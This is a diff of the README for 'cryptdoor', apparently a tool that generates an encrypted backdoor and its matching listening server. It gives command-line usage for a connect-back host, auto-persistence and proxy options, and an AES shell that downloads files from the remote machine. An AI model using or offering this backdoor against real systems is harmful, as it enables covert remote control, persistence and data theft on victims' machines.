Waflz/cryptdoor/README.md

 Usage
 =========

+	usage: ./cryptdoor.py [options]

+	optional arguments:
+	  -h, --help            show this help message and exit -i HOSTNAME, --hostname HOSTNAME
+	                        Ip or hostname to connect back to.
+	  -p PORT, --port PORT  Port.
+	  -a, --persistence     Enable Auto-persistence.
+	  -x, --proxy           Enable HTTP proxy connect.
+	  -b BACKDOORNAME, --backdoorname BACKDOORNAME
+	                        Name of backdoor (default backdoor.py).
+	  -s SERVERNAME, --servername SERVERNAME
+ 	                       Name of server (default server.py).

 cryptdoor.py will make the backdoor and server.
 The syntax is:

-	./cryptdoor.py host port
+	./cryptdoor.py -i host -p port

-You can add a -p to attempt automatic persistence like:
+You can add a -a to attempt automatic persistence like:

-	./cryptdoor.py host port -p
+	./cryptdoor.py -i host -p port -a

-host and port refer to the host and port of the listening server.
+host and port refer to the host and port of the listening server (attacker).
+These are the options you have from withing the shell:

 	AES-shell options:
     	 download file       -  Download a file from remote pwd to localhost.